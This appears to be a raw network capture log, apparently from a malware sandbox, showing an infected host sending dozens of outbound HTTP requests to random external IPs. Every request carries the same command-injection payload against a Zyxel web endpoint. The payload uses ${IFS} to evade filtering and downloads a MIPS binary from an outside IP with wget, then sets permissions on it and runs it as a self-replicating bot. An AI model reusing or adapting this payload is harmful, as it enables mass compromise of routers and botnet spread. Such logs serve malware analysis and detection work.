                                        Jan 14, 2024 16:18:49.563987970 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        5529192.168.2.133645691.255.132.177443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:49.564038992 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        5530192.168.2.135402849.33.188.143443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:49.564064980 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        5531192.168.2.1354808188.100.28.229443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:49.564116955 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        5532192.168.2.136005058.116.20.183443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:49.564146042 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        5533192.168.2.1355050173.95.154.47443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:49.564192057 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        5534192.168.2.133648860.30.83.19443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:49.564229965 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        5535192.168.2.133283876.77.132.65443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:49.564280987 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        5536192.168.2.1358094115.130.251.174443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:49.564322948 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        5537192.168.2.1341384138.199.142.239443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:49.564363956 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        5538192.168.2.134515053.245.253.128443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:49.564414978 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        5539192.168.2.134124453.140.182.208443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:49.564456940 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        5540192.168.2.133891247.138.27.217443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:49.564481974 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        5541192.168.2.1344444134.85.34.202443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:49.564528942 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        5542192.168.2.135682682.84.2.239443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:49.564577103 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        5543192.168.2.1334032161.146.57.123443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:49.564604998 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        5544192.168.2.134856465.76.65.118443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:49.564662933 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        5545192.168.2.1333508174.36.177.64443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:49.564694881 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        5546192.168.2.1342328143.185.77.209443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:49.564747095 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        5547192.168.2.1339148220.44.90.187443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:49.564790964 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        5548192.168.2.1352216132.65.118.215443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:49.564830065 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        5549192.168.2.1338572164.152.65.59443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:49.564851999 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        5550192.168.2.1333104129.3.168.96443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:49.564941883 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        5551192.168.2.1348698150.30.253.127443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:49.564963102 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        5552192.168.2.1345960116.198.20.25443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:49.565018892 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        5553192.168.2.1359150170.89.157.159443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:49.565068007 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        5554192.168.2.133649454.104.244.90443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:49.565114975 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        5555192.168.2.1349818145.241.54.140443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:49.565155983 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        5556192.168.2.1341292194.154.101.22443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:49.565205097 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        5557192.168.2.1334578175.138.223.161443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:49.565237999 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        5558192.168.2.1357768174.53.119.226443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:49.565280914 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        5559192.168.2.1345134169.35.207.237443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:49.565316916 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        5560192.168.2.1353278106.172.184.120443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:49.565363884 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        5561192.168.2.1346532145.211.153.119443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:49.565409899 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        5562192.168.2.134994486.190.168.127443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:49.565428972 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        5563192.168.2.133550477.94.132.55443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:49.565475941 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        5564192.168.2.1355090160.91.157.95443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:49.565514088 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        5565192.168.2.1345776106.137.123.182443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:49.565534115 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        5566192.168.2.1353600123.21.95.237443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:49.565557003 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        5567192.168.2.1342906222.185.16.126443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:49.565588951 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        5568192.168.2.1353828150.165.147.91443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:49.565643072 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        5569192.168.2.1347174190.141.66.151443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:49.565682888 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        5570192.168.2.133448820.149.95.13443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:49.565726042 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        5571192.168.2.1345938125.13.254.154443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:49.565742016 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        5572192.168.2.134837684.83.191.138443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:49.565778971 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        5573192.168.2.1347934183.14.130.155443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:49.565815926 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        5574192.168.2.1354858189.41.130.218443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:49.565864086 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        5575192.168.2.1345788144.68.11.92443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:49.565892935 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        5576192.168.2.1345140180.248.67.34443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:49.565948009 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        5577192.168.2.135266249.11.13.162443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:49.565970898 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        5578192.168.2.134814848.202.21.80443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:49.566035032 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        5579192.168.2.1360628196.233.100.39443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:49.566072941 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        5580192.168.2.135540268.141.9.114443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:49.566106081 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        5581192.168.2.1354862203.250.17.53443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:49.566157103 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        5582192.168.2.1335206166.102.186.73443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:49.566219091 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        5583192.168.2.1349410172.141.183.221443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:49.566255093 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        5584192.168.2.1337256195.211.182.237443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:49.566312075 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        5585192.168.2.1352506101.201.163.214443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:49.566349030 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        5586192.168.2.1344230217.91.25.24443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:49.566385984 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        5587192.168.2.13468821.65.12.73443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:49.566437006 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        5588192.168.2.135889262.151.52.255443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:49.566477060 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        5589192.168.2.1360214135.34.48.170443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:49.566514969 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        5590192.168.2.1344292202.239.95.53443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:49.566545010 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        5591192.168.2.133814044.10.74.45443
                                        TimestampBytes transferredDirectionData
